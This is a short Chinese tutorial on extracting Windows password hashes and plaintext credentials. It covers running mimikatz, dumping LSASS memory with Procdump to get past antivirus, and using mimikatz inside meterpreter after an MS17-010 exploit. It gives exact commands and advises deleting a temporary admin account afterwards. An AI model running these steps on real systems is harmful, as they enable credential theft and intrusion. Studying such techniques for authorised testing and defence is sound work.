前言
介紹一下windows的密碼hash值的組成:
Windows系統下的hash密碼格式為:用戶名稱:RID:LM-HASH值:NT-HASH值,例如:
Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
用戶名稱為:Administrator
RID為:500
LM-HASH值為:C8825DB10F2590EAAAD3B435B51404EE
NTLM-HASH值為:683020925C5D8569C23AA724774CE6CC
如果你知道這個用戶的hash密碼了,拿着C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC去hash在線查詢網站。下面介紹利用mimikatz工具來抓取hash及明文密碼
利用mimikatz抓取windows的明文密碼
簡單介紹:windows下抓取密碼神器之mimikatz,使用該工具可以抓取內存中的明文密碼,包括登錄其他域的密碼,訪問某些VPN的密碼等!該工具主要在內網中進行使用,先通過添加管理賬號登錄到系統中,然后使用該工具抓取原系統中的管理員賬號密碼,從而刪除自己創建的賬號!
它是首先利用LM-Hash的弱點窮舉出原始明文口令的大小寫不敏感版本,再利用NTLM-Hash修正出原始明文口令的大小寫敏感版本。
工具下載地址:https://github.com/gentilkiwi/mimikatz/releases
基本使用,在cmd里面運行mimikatz.exe,然后輸入如下兩條命令:
privilege::debug
sekurlsa::logonpasswords
結果如下:
可以看到確實爆出了明文。
Procdump工具配合mimikatz使用
但是在滲透過程中,難免遇到對方系統裝了360或者其他殺毒軟件,碰到mimikatz.exe就會將其查殺。也就是說我想利用這款軟件常規思路獲取系統的密碼HASH已經是不太可能了。
其實,我們可以先dump對方主機的LSASS內存文件,然后在自己主機用mimikatz進行處理,這樣就可以得到對方主機的系統HASH和密碼了。
Procdump工具下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
將此工具上傳或者下載到目標機目錄下,然后在當前目錄下執行:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
看lsass.dmp文件生成的路徑位置,然后把這個文件下載到攻擊機上的mimikatz.exe所在的路徑,在這個路徑進入cmd命令行,然后執行:
mimikatz.exe "sekurlsa::minidump lsass.dmp"
接着執行
sekurlsa::logonpasswords
就可以獲取到目標機的hash和可能的明文密碼了。
meterpreter配合mimikatz抓取密碼
得知web服務器下存在域管理,配合kali利用例如ms17_010反彈某台機子的meterpreter交互式,然后使用如下兩條命令抓取域用戶密碼:
load mimikatz
kerberos